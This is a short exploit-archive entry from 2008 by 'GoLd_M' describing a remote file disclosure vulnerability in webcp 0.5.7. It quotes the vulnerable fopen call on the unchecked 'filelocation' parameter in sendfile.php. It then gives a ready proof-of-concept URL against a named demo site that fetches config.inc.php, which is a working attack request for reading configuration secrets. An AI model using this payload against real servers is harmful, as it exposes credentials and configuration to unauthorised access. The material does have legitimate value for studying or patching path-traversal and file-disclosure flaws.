[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : webcp 0.5.7 (filelocation) Remote File Disclosure Vulnerability
# Published : 2008-09-24
# Author : GoLd_M
# Previous Title : Jadu CMS for Government (recruit_details.php) SQL Injection Vuln
# Next Title : ADN Forum <= 1.0b Insecure Cookie Handling Vulnerability
##################################################################################
## webcp 0.5.7 (sendfile.php filelocation) Remote File Disclosure Vulnerability
## Script : http://www.web-cp.net/releases/webcp-0.5.7.tar.gz
## Demo : http://gyrbo.madoka.be/web-cp/
## Vuln :
## }
## if ($tf = fopen($filelocation, "r")) {
## // Date in the past
##################################################################################
## POC :
## http://gyrbo.madoka.be/web-cp/sendfile.php?filelocation=config.inc.php
## Open By Mozilla Firefox
##################################################################################
# www.Syue.com [2008-09-24]